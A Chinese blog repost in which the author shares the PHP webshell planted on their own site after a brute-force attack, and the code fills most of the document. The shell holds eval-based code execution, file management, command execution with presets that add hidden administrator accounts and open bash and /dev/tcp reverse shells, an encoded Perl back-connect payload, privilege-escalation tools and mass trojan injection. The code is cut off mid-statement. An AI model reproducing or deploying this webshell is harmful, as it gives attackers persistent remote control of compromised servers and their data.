今天站点被人爆破,并成功入马,现在把马放出来,给有需要的人。
<?php
header("Content-type:text/html;charset=gbk");
$password='fool';
$shellname='MrFooL';
$myurl=null;
error_reporting(0);
ob_start();
define('myaddress',$_SERVER['SCRIPT_FILENAME']);
define('postpass',$password);
define('shellname',$shellname);
define('myurl',$myurl);
if(@get_magic_quotes_gpc()){
foreach($_POST as $k => $v) $_POST[$k] = stripslashes($v);
foreach($_GET as $k => $v) $_GET[$k] = stripslashes($v);
}
if(isset($_REQUEST[postpass])){
hmlogin(2);
@eval($_REQUEST[postpass]);
exit;}
if($_COOKIE['postpass'] != md5(postpass)){
if($_POST['postpass']){
if($_POST['postpass'] == postpass){
setcookie('postpass',md5($_POST['postpass']));
hmlogin();
}else{
echo '<CENTER>用户或密码错误</CENTER>';
}
}
islogin($shellname,$myurl);
exit;
}
if(isset($_GET['down'])) do_down($_GET['down']);
if(isset($_GET['pack'])){
$dir = do_show($_GET['pack']);
$zip = new eanver($dir);
$out = $zip->out;
do_download($out,$_SERVER['HTTP_HOST'].".tar.gz");
}
if(isset($_GET['unzip'])){
css_main();
start_unzip($_GET['unzip'],$_GET['unzip'],$_GET['todir']);
exit;
}
define('root_dir',str_replace('\\','/',dirname(myaddress)).'/');
define('run_win',substr(PHP_OS, 0, 3) == "WIN");
define('my_shell',str_path(root_dir.$_SERVER['SCRIPT_NAME']));
$eanver = isset($_GET['eanver']) ? $_GET['eanver'] : "";
$doing = isset($_POST['doing']) ? $_POST['doing'] : "";
$path = isset($_GET['path']) ? $_GET['path'] : root_dir;
$name = isset($_POST['name']) ? $_POST['name'] : "";
$img = isset($_GET['img']) ? $_GET['img'] : "";
$p = isset($_GET['p']) ? $_GET['p'] : "";
$pp = urlencode(dirname($p));
if($img) css_img($img);
if($eanver == "phpinfo") die(phpinfo());
if($eanver == 'logout'){
setcookie('postpass',null);
die('<meta http-equiv="refresh" content="0;URL=?">');
}
$class = array(
"信息操作" => array("upfiles" => "上传文件","phpinfo" => "基本信息","info_f" => "系统信息","phpcode" => "执行PHP脚本"),
"提权工具" => array("sqlshell" => "执行SQL执行","mysql_exec" => "MYSQL操作","myexp" => "MYSQL提权","servu" => "Serv-U提权","cmd" => "执行命令","linux" => "反弹提权","downloader" => "文件下载","port" => "端口扫描"),
"批量操作" => array("guama" => "批量挂马清马","tihuan" => "批量替换内容","scanfile" => "批量搜索文件","scanphp" => "批量查找木马"),
"脚本插件" => array("getcode" => "在线代理")
);
$msg = array("0" => "保存成功","1" => "保存失败","2" => "上传成功","3" => "上传失败","4" => "修改成功","5" => "修改失败","6" => "删除成功","7" => "删除失败");
css_main();
switch($eanver){
case "left":
css_left();
html_n("<dl><dt><a href=\"#\" οnclick=\"showHide('items1');\" target=\"_self\">");
html_img("title");html_n(" 本地硬盘</a></dt><dd id=\"items1\" style=\"display:block;\"><ul>");
$ROOT_DIR = File_Mode();
html_n("<li><a title='$ROOT_DIR' href='?eanver=main&path=$ROOT_DIR' target='main'>网站根目录</a></li>");
html_n("<li><a href='?eanver=main' target='main'>本程序目录</a></li>");
for ($i=66;$i<=90;$i++){
$drive= chr($i).':';
if (is_dir($drive."/")){
$vol=File_Str("vol $drive");if(empty($vol))$vol=$drive;
html_n("<li><a title='$drive' href='?eanver=main&path=$drive' target='main'>本地磁盘($drive)</a></li>");}}
html_n("</ul></dd></dl>");
$i = 2;
foreach($class as $name => $array){
html_n("<dl><dt><a href=\"#\" οnclick=\"showHide('items$i');\" target=\"_self\">");
html_img("title");html_n(" $name</a></dt><dd id=\"items$i\" style=\"display:block;\"><ul>");
foreach($array as $url => $value){
html_n("<li><a href=\"?eanver=$url\" target='main'>$value</a></li>");
}
html_n("</ul></dd></dl>");
$i++;
}
html_n("<dl><dt><a href=\"#\" οnclick=\"showHide('items$i');\" target=\"_self\">");
html_img("title");html_n(" 其它操作</a></dt><dd id=\"items$i\" style=\"display:block;\"><ul>");
html_n("<li><a title='安全退出' href='?eanver=logout' target=\"main\">安全退出</a></li>");
html_n("</ul></dd></dl>");
html_n("</div>");
break;
case "main":
css_js("1");
$dir = @dir($path);
$REAL_DIR = File_Str(realpath($path));
if(!empty($_POST['actall'])){
echo '<div class="actall">'.File_Act($_POST['files'],$_POST['actall'],$_POST['inver'],$REAL_DIR).'</div>';}
$NUM_D = $NUM_F = 0;
if(!$_SERVER['SERVER_NAME']) $GETURL = ''; else $GETURL = 'http://'.$_SERVER['SERVER_NAME'].'/';
$ROOT_DIR = File_Mode();
html_n("<table width=\"100%\" border=0 bgcolor=\"#555555\"><tr><td><form method='GET'>地址:<input type='hidden' name='eanver' value='main'>");
html_n("<input type='text' size='80' name='path' value='$path'> <input type='submit' value='转到'></form>");
html_n("<br><form method='POST' enctype=\"multipart/form-data\" action='?eanver=editr&p=".urlencode($path)."'>");
html_n("<input type=\"button\" value=\"新建文件\" οnclick=\"rusurechk('newfile.php','?eanver=editr&p=".urlencode($path)."&refile=1&name=');\"> <input type=\"button\" value=\"新建目录\" οnclick=\"rusurechk('newdir','?eanver=editr&p=".urlencode($path)."&redir=1&name=');\">");
html_input("file","upfilet",""," ");
html_input("submit","uploadt","上传");
if(!empty($_POST['newfile'])){
if(isset($_POST['bin'])) $bin = $_POST['bin']; else $bin = "wb";
$newfile=base64_decode($_POST['newfile']);
if(strtolower($_POST['charset'])=='utf-8'){
$txt=base64_decode($_POST['txt']);}else{
$txt=$_POST['txt'];}
if (substr(PHP_VERSION,0,1)>=5){
if((strtolower($_POST['charset'])=='gb2312') or (strtolower($_POST['charset'])=='gbk')){
$txt=iconv("UTF-8","gb2312//IGNORE" ,base64_decode($_POST['txt']));}else{
$txt = array_iconv($txt);}}
echo do_write($newfile,$bin,$txt) ? '<br>'.$newfile.' '.$msg[0] : '<br>'.$newfile.' '.$msg[1];
@touch($newfile,@strtotime($_POST['time']));
}
html_n('</form></td></tr></table><form method="POST" name="fileall" id="fileall" action="?eanver=main&path='.$path.'"><table width="100%" border=0 bgcolor="#555555"><tr height="25"><td width="45%"><b>');
html_a('?eanver=main&path='.uppath($path),'<b>上级目录</b>');
html_n('</b></td><td align="center" width="10%"><b>操作</b></td><td align="center" width="5%"><b>文件属性</b></td>');
html_n('<td align="center" width="8%"><b>('.get_current_user().')用户|组</b></td>');
html_n('<td align="center" width="10%"><b>修改时间</b></td><td align="center" width="10%"><b>文件大小</b></td></tr>');
while($dirs = @$dir->read()){
if($dirs == '.' or $dirs == '..') continue;
$dirpath = str_path("$path/$dirs");
if(is_dir($dirpath)){
$perm = substr(base_convert(fileperms($dirpath),10,8),-4);
$filetime = @date('Y-m-d H:i:s',@filemtime($dirpath));
$dirpath = urlencode($dirpath);
html_n('<tr height="25"><td><input type="checkbox" name="files[]" value="'.$dirs.'">');
html_img("dir");
html_a('?eanver=main&path='.$dirpath,$dirs);
html_n('</td><td align="center">');
html_n("<a href=\"#\" onClick=\"rusurechk('$dirs','?eanver=rename&p=$dirpath&newname=');return false;\">改名</a>");
html_n("<a href=\"#\" onClick=\"rusuredel('$dirs','?eanver=deltree&p=$dirpath');return false;\">删除</a> ");
html_a('?pack='.$dirpath,'打包');
html_n('</td><td align="center">');
html_a('?eanver=perm&p='.$dirpath.'&chmod='.$perm,$perm);
html_n('</td><td align="center">'.GetFileOwner("$path/$dirs").':'.GetFileGroup("$path/$dirs"));
html_n('</td><td align="center">'.$filetime.'</td><td align="right">');
html_n('</td></tr>');
$NUM_D++;
}
}
@$dir->rewind();
while($files = @$dir->read()){
if($files == '.' or $files == '..') continue;
$filepath = str_path("$path/$files");
if(!is_dir($filepath)){
$fsize = @filesize($filepath);
$fsize = File_Size($fsize);
$perm = substr(base_convert(fileperms($filepath),10,8),-4);
$filetime = @date('Y-m-d H:i:s',@filemtime($filepath));
$Fileurls = str_replace(File_Str($ROOT_DIR.'/'),$GETURL,$filepath);
$todir=$ROOT_DIR.'/zipfile';
$filepath = urlencode($filepath);
$it=substr($filepath,-3);
html_n('<tr height="25"><td><input type="checkbox" name="files[]" value="'.$files.'">');
html_img(css_showimg($files));
html_a($Fileurls,$files,'target="_blank"');
html_n('</td><td align="center">');
if(($it=='.gz') or ($it=='zip') or ($it=='tar') or ($it=='.7z'))
html_a('?unzip='.$filepath,'解压','title="解压'.$files.'" onClick="rusurechk(\''.$todir.'\',\'?unzip='.$filepath.'&todir=\');return false;"');
else
html_a('?eanver=editr&p='.$filepath,'编辑','title="编辑'.$files.'"');
html_n("<a href=\"#\" onClick=\"rusurechk('$files','?eanver=rename&p=$filepath&newname=');return false;\">改名</a>");
html_n("<a href=\"#\" onClick=\"rusuredel('$files','?eanver=del&p=$filepath');return false;\">删除</a> ");
html_n("<a href=\"#\" onClick=\"rusurechk('".urldecode($filepath)."','?eanver=copy&p=$filepath&newcopy=');return false;\">复制</a>");
html_a('?down='.$filepath,'下载','编辑','title="下载'.$files.'"');
html_n('</td><td align="center">');
html_a('?eanver=perm&p='.$filepath.'&chmod='.$perm,$perm);
html_n('</td><td align="center">'.GetFileOwner("$path/$files").':'.GetFileGroup("$path/$files"));
html_n('</td><td align="center">'.$filetime.'</td><td align="right">');
html_a('?down='.$filepath,$fsize,'title="下载'.$files.'"');
html_n('</td></tr>');
$NUM_F++;
}
}
@$dir->close();
if(!$Filetime) $Filetime = gmdate('Y-m-d H:i:s',time() + 3600 * 8);
print<<<END </table> <div class="actall"> <input type="hidden" id="actall" name="actall" value="undefined"> <input type="hidden" id="inver" name="inver" value="undefined"> <input name="chkall" value="on" type="checkbox" οnclick="CheckAll(this.form);"> <input type="button" value="复制" οnclick="SubmitUrl('复制所选文件到路径: ','{
$REAL_DIR}','a');return false;"> <input type="button" value="删除" οnclick="Delok('所选文件','b');return false;"> <input type="button" value="属性" οnclick="SubmitUrl('修改所选文件属性值为: ','0666','c');return false;"> <input type="button" value="时间" οnclick="CheckDate('{
$Filetime}','d');return false;"> <input type="button" value="打包" οnclick="SubmitUrl('打包并下载所选文件下载名为: ','{
$_SERVER['SERVER_NAME']}.tar.gz','e');return false;"> 目录({
$NUM_D}) / 文件({
$NUM_F})</div> </form> END;
break;
case "editr":
print<<<END <script> END;
html_base();
print<<<END </script> END;
css_js("2");
if(!empty($_POST['uploadt'])){
echo @copy($_FILES['upfilet']['tmp_name'],str_path($p.'/'.$_FILES['upfilet']['name'])) ? html_a("?eanver=main",$_FILES['upfilet']['name'].' '.$msg[2]) : msg($msg[3]);
die('<meta http-equiv="refresh" content="1;URL=?eanver=main&path='.urlencode($p).'">');
}
if(!empty($_GET['redir'])){
$name=$_GET['name'];
$newdir = str_path($p.'/'.$name);
@mkdir($newdir,0777) ? html_a("?eanver=main",$name.' '.$msg[0]) : msg($msg[1]);
die('<meta http-equiv="refresh" content="1;URL=?eanver=main&path='.urlencode($p).'">');
}
if(!empty($_GET['refile'])){
$name=$_GET['name'];
$jspath=urlencode($p.'/'.$name);
$pp = urlencode($p);
$p = str_path($p.'/'.$name);
$FILE_CODE = "";
$charset= 'GB2312';
$FILE_TIME =date('Y-m-d H:i:s',time()+3600*8);
if(@file_exists($p)) echo '发现目录下有"同名"文件<br>';
}else{
$jspath=urlencode($p);
$FILE_TIME = date('Y-m-d H:i:s',filemtime($p));
$FILE_CODE=@file_get_contents($p);
if (substr(PHP_VERSION,0,1)>=5){
if(empty($_GET['charset'])){
if(TestUtf8($FILE_CODE)>1){
$charset= 'UTF-8';$FILE_CODE = iconv("UTF-8","gb2312//IGNORE",$FILE_CODE);}else{
$charset= 'GB2312';}
}else{
if($_GET['charset']=='GB2312'){
$charset= 'GB2312';}else{
$charset= $_GET['charset'];$FILE_CODE = iconv($_GET['charset'],"gb2312//IGNORE",$FILE_CODE);}
}
}
$FILE_CODE = htmlspecialchars($FILE_CODE);
}
print<<<END <div class="actall">查找内容: <input name="searchs" type="text" value="{
$dim}" style="width:500px;"> <input type="button" value="查找" οnclick="search(searchs.value)"></div> <form method='POST' id="editor" action='?eanver=main&path={
$pp}'> <div class="actall"> <input type="text" name="newfile" id="newfile" value="{
$p}" style="width:750px;">指定编码:<input name="charset" id="charset" value="{
$charset}" Type="text" style="width:80px;" οnkeydοwn="if(event.keyCode==13)window.location='?eanver=editr&p={
$jspath}&charset='+this.value;"> <input type="button" value="选择" οnclick="window.location='?eanver=editr&p={
$jspath}&charset='+this.form.charset.value;" style="width:50px;"> END;
html_select(array("GB2312" => "GB2312","UTF-8" => "UTF-8","BIG5" => "BIG5","EUC-KR" => "EUC-KR","EUC-JP" => "EUC-JP","SHIFT-JIS" => "SHIFT-JIS","WINDOWS-874" => "WINDOWS-874","ISO-8859-1" => "ISO-8859-1"),$charset,"οnchange=\"window.location='?eanver=editr&p={
$jspath}&charset='+options[selectedIndex].value;\"");
print<<<END </div> <div class="actall"><textarea name="txt" id="txt" style="width:100%;height:380px;">{
$FILE_CODE}</textarea></div> <div class="actall">文件修改时间 <input type="text" name="time" id="mtime" value="{
$FILE_TIME}" style="width:150px;"> <input type="checkbox" name="bin" value="wb+" size="" checked>以二进制形式保存文件(建议使用)</div> <div class="actall"><input type="button" value="保存" οnclick="CheckDate();" style="width:80px;"> <input name='reset' type='reset' value='重置'> <input type="button" value="返回" οnclick="window.location='?eanver=main&path={
$pp}';" style="width:80px;"></div> </form> END;
break;
case "rename":
html_n("<tr><td>");
$newname = urldecode($pp).'/'.urlencode($_GET['newname']);
@rename($p,$newname) ? html_a("?eanver=main&path=$pp",urlencode($_GET['newname']).' '.$msg[4]) : msg($msg[5]);
die('<meta http-equiv="refresh" content="1;URL=?eanver=main&path='.$pp.'">');
break;
case "deltree":
html_n("<tr><td>");
do_deltree($p) ? html_a("?eanver=main&path=$pp",$p.' '.$msg[6]) : msg($msg[7]);
die('<meta http-equiv="refresh" content="1;URL=?eanver=main&path='.$pp.'">');
break;
case "del":
html_n("<tr><td>");
@unlink($p) ? html_a("?eanver=main&path=$pp",$p.' '.$msg[6]) : msg($msg[7]);
die('<meta http-equiv="refresh" content="1;URL=?eanver=main&path='.$pp.'">');
break;
case "copy":
html_n("<tr><td>");
$newpath = explode('/',$_GET['newcopy']);
$pathr[0] = $newpath[0];
for($i=1;$i < count($newpath);$i++){
$pathr[] = urlencode($newpath[$i]);
}
$newcopy = implode('/',$pathr);
@copy($p,$newcopy) ? html_a("?eanver=main&path=$pp",$newcopy.' '.$msg[4]) : msg($msg[5]);
die('<meta http-equiv="refresh" content="1;URL=?eanver=main&path='.$pp.'">');
break;
case "perm":
html_n("<form method='POST'><tr><td>".$p.' 属性为: ');
if(is_dir($p)){
html_select(array("0777" => "0777","0755" => "0755","0555" => "0555"),$_GET['chmod']);
}else{
html_select(array("0666" => "0666","0644" => "0644","0444" => "0444"),$_GET['chmod']);
}
html_input("submit","save","修改");
back();
if($_POST['class']){
switch($_POST['class']){
case "0777": $change = @chmod($p,0777); break;
case "0755": $change = @chmod($p,0755); break;
case "0555": $change = @chmod($p,0555); break;
case "0666": $change = @chmod($p,0666); break;
case "0644": $change = @chmod($p,0644); break;
case "0444": $change = @chmod($p,0444); break;
}
$change ? html_a("?eanver=main&path=$pp",$msg[4]) : msg($msg[5]);
die('<meta http-equiv="refresh" content="1;URL=?eanver=main&path='.$pp.'">');
}
html_n("</td></tr></form>");
break;
case "info_f":
$dis_func = get_cfg_var("disable_functions");
$upsize = get_cfg_var("file_uploads") ? get_cfg_var("upload_max_filesize") : "不允许上传";
$adminmail = (isset($_SERVER['SERVER_ADMIN'])) ? "<a href=\"mailto:".$_SERVER['SERVER_ADMIN']."\">".$_SERVER['SERVER_ADMIN']."</a>" : "<a href=\"mailto:".get_cfg_var("sendmail_from")."\">".get_cfg_var("sendmail_from")."</a>";
if($dis_func == ""){
$dis_func = "No";}else{
$dis_func = str_replace(" ","<br>",$dis_func);$dis_func = str_replace(",","<br>",$dis_func);}
$phpinfo = (!eregi("phpinfo",$dis_func)) ? "Yes" : "No";
$info = array(
array("服务器时间",date("Y年m月d日 h:i:s",time())),
array("服务器域名","<a href=\"http://".$_SERVER['SERVER_NAME']."\" target=\"_blank\">".$_SERVER['SERVER_NAME']."</a>"),
array("服务器IP地址",gethostbyname($_SERVER['SERVER_NAME'])),
array("服务器操作系统",PHP_OS),
array("服务器操作系统文字编码",$_SERVER['HTTP_ACCEPT_LANGUAGE']),
array("服务器解译引擎",$_SERVER['SERVER_SOFTWARE']),
array("你的IP",$_SERVER["REMOTE_ADDR"]),
array("Web服务端口",$_SERVER['SERVER_PORT']),
array("PHP运行方式",strtoupper(php_sapi_name())),
array("PHP版本",PHP_VERSION),
array("运行于安全模式",Info_Cfg("safemode")),
array("服务器管理员",$adminmail),
array("本文件路径",myaddress),
array("允许使用 URL 打开文件 allow_url_fopen",Info_Cfg("allow_url_fopen")),
array("允许使用curl_exec",Info_Fun("curl_exec")),
array("允许动态加载链接库 enable_dl",Info_Cfg("enable_dl")),
array("显示错误信息 display_errors",Info_Cfg("display_errors")),
array("自动定义全局变量 register_globals",Info_Cfg("register_globals")),
array("magic_quotes_gpc",Info_Cfg("magic_quotes_gpc")),
array("程序最多允许使用内存量 memory_limit",Info_Cfg("memory_limit")),
array("POST最大字节数 post_max_size",Info_Cfg("post_max_size")),
array("允许最大上传文件 upload_max_filesize",$upsize),
array("程序最长运行时间 max_execution_time",Info_Cfg("max_execution_time")."秒"),
array("被禁用的函数 disable_functions",$dis_func),
array("phpinfo()",$phpinfo),
array("目前还有空余空间diskfreespace",intval(diskfreespace(".") / (1024 * 1024)).'Mb'),
array("图形处理 GD Library",Info_Fun("imageline")),
array("IMAP电子邮件系统",Info_Fun("imap_close")),
array("MySQL数据库",Info_Fun("mysql_close")),
array("SyBase数据库",Info_Fun("sybase_close")),
array("Oracle数据库",Info_Fun("ora_close")),
array("Oracle 8 数据库",Info_Fun("OCILogOff")),
array("PREL相容语法 PCRE",Info_Fun("preg_match")),
array("PDF文档支持",Info_Fun("pdf_close")),
array("Postgre SQL数据库",Info_Fun("pg_close")),
array("SNMP网络管理协议",Info_Fun("snmpget")),
array("压缩文件支持(Zlib)",Info_Fun("gzclose")),
array("XML解析",Info_Fun("xml_set_object")),
array("FTP",Info_Fun("ftp_login")),
array("ODBC数据库连接",Info_Fun("odbc_close")),
array("Session支持",Info_Fun("session_start")),
array("Socket支持",Info_Fun("fsockopen")),
);
$shell = new COM("WScript.Shell") or die("This thing requires Windows Scripting Host");
echo '<table width="100%" border="0">';
for($i = 0;$i < count($info);$i++){
echo '<tr><td width="40%">'.$info[$i][0].'</td><td>'.$info[$i][1].'</td></tr>'."\n";}
try{
$registry_proxystring = $shell->RegRead("HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\Wds\\rdpwd\\Tds\\tcp\PortNumber");
$Telnet = $shell->RegRead("HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\TelnetServer\\1.0\\TelnetPort");
$PcAnywhere = $shell->RegRead("HKEY_LOCAL_MACHINE\\SOFTWARE\\Symantec\\pcAnywhere\\CurrentVersion\\System\\TCPIPDataPort");
}catch(Exception $e){
}
echo '<tr><td width="40%">Terminal Service端口为</td><td>'.$registry_proxystring.'</td></tr>'."\n";
echo '<tr><td width="40%">Telnet端口为</td><td>'.$Telnet.'</td></tr>'."\n";
echo '<tr><td width="40%">PcAnywhere端口为</td><td>'.$PcAnywhere.'</td></tr>'."\n";
echo '</table>';
break;
case "cmd":
$res = '回显窗口';
$cmd = 'whoami';
if(!empty($_POST['cmd'])){
$res = Exec_Run(base64_decode($_POST['cmd']));$cmd = htmlspecialchars(base64_decode($_POST['cmd']));}
print<<<END <script language="javascript"> function sFull(i){ Str = new Array(11); Str[0] = "dir"; Str[1] = "net user mysql$ envl /add"; Str[2] = "net localgroup administrators mysql$ /add"; Str[3] = "netstat -ano"; Str[4] = "ipconfig"; Str[5] = "tasklist /svc"; Str[6] = "tftp -i {
$_SERVER["REMOTE_ADDR"]} get server.exe c:\\server.exe"; Str[7] = "0<&123;exec 123<>/dev/tcp/{
$_SERVER["REMOTE_ADDR"]}/12666; sh <&123 >&123 2>&123"; Str[8] = "bash -i >& /dev/tcp/{
$_SERVER["REMOTE_ADDR"]}/2366 0>&1"; Str[9] = "netstat -tlnp"; document.getElementById('cmd').value = Str[i]; return true; } END;
html_base();
print<<<END function SubmitUrl(){ document.getElementById('cmd').value = base64encode(document.getElementById('cmd').value); document.getElementById('gform').submit(); } </script> <form method="POST" name="gform" id="gform" ><center><div class="actall">执行命令新增很多隐藏函数,外加使用BASE64加密提交,防止被拦(小细节,大成就)</div><div class="actall"> 命令参数 <input type="text" name="cmd" id="cmd" value="{
$cmd}" οnkeydοwn="if(event.keyCode==13)SubmitUrl();" style="width:399px;"> <select οnchange='return sFull(options[selectedIndex].value)'> <option value="0" selected>--命令集合--</option> <option value="1">添加管理员</option> <option value="2">设为管理组</option> <option value="3">查看端口</option> <option value="4">查看地址</option> <option value="5">查看进程</option> <option value="6">FTP下载</option> <option value="7">Linux反弹</option> <option value="8">bash反弹</option> <option value="9">Linux端口</option> </select> <input type="button" value="执行" οnclick="SubmitUrl();" style="width:80px;"> </div> <div class="actall"><textarea name="show" style="width:660px;height:399px;">{
$res}</textarea></div></center> </form> END;
break;
case "linux":
$yourip = $_COOKIE['yourip'] ? $_COOKIE['yourip'] : getenv('REMOTE_ADDR');
$yourport = $_COOKIE['yourport'] ? $_COOKIE['yourport'] : '12388';
$system=strtoupper(substr(PHP_OS, 0, 3));
print<<<END <div class="actall">使用方法:<br> 先在自己电脑运行"nc -vv -l 12388"<br> 然后在此填写你电脑的IP,点连接!此反弹很全很实用!包括NC反弹!</div> <form method="POST" name="kform" id="kform"> <div class="actall">你的地址 <input type="text" name="yourip" value="{
$yourip}" style="width:400px"></div> <div class="actall">连接端口 <input type="text" name="yourport" value="{
$yourport}" style="width:400px"></div> <div class="actall">执行方式 <select name="use" > <option value="perl">Perl</option> <option value="c">C</option> <option value="php">PHP</option> <option value="nc">NC</option> </select></div> <div class="actall"><input type="submit" value="开始连接" style="width:80px;"></div></form> END;
if((!empty($_POST['yourip'])) && (!empty($_POST['yourport'])))
{
setcookie('yourip',$backip);
setcookie('yourport',$backport);
echo '<div class="actall">';
if($_POST['use'] == 'perl')
{
$back_connect_pl="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj".
"aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR".
"hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT".
"sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI".
"kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi".
"KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl".
"OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
echo File_Write('/tmp/envl_bc',base64_decode($back_connect_pl),'wb') ? '创建/tmp/envl_bc成功<br>' : '创建/tmp/envl_bc失败<br>';
$perlpath = Exec_Run('which perl');
$perlpath = $perlpath ? chop($perlpath) : 'perl';
@unlink('/tmp/envl_bc.c');
echo Exec_Run($perlpath.' /tmp/envl_bc '.$_POST['yourip'].' '.$_POST['yourport'].' &'
今天的文章送一个大马给有需要的人,请不要做非法之事分享到此就结束了,感谢您的阅读。
版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 举报,一经查实,本站将立刻删除。
如需转载请保留出处:https://bianchenghao.cn/66137.html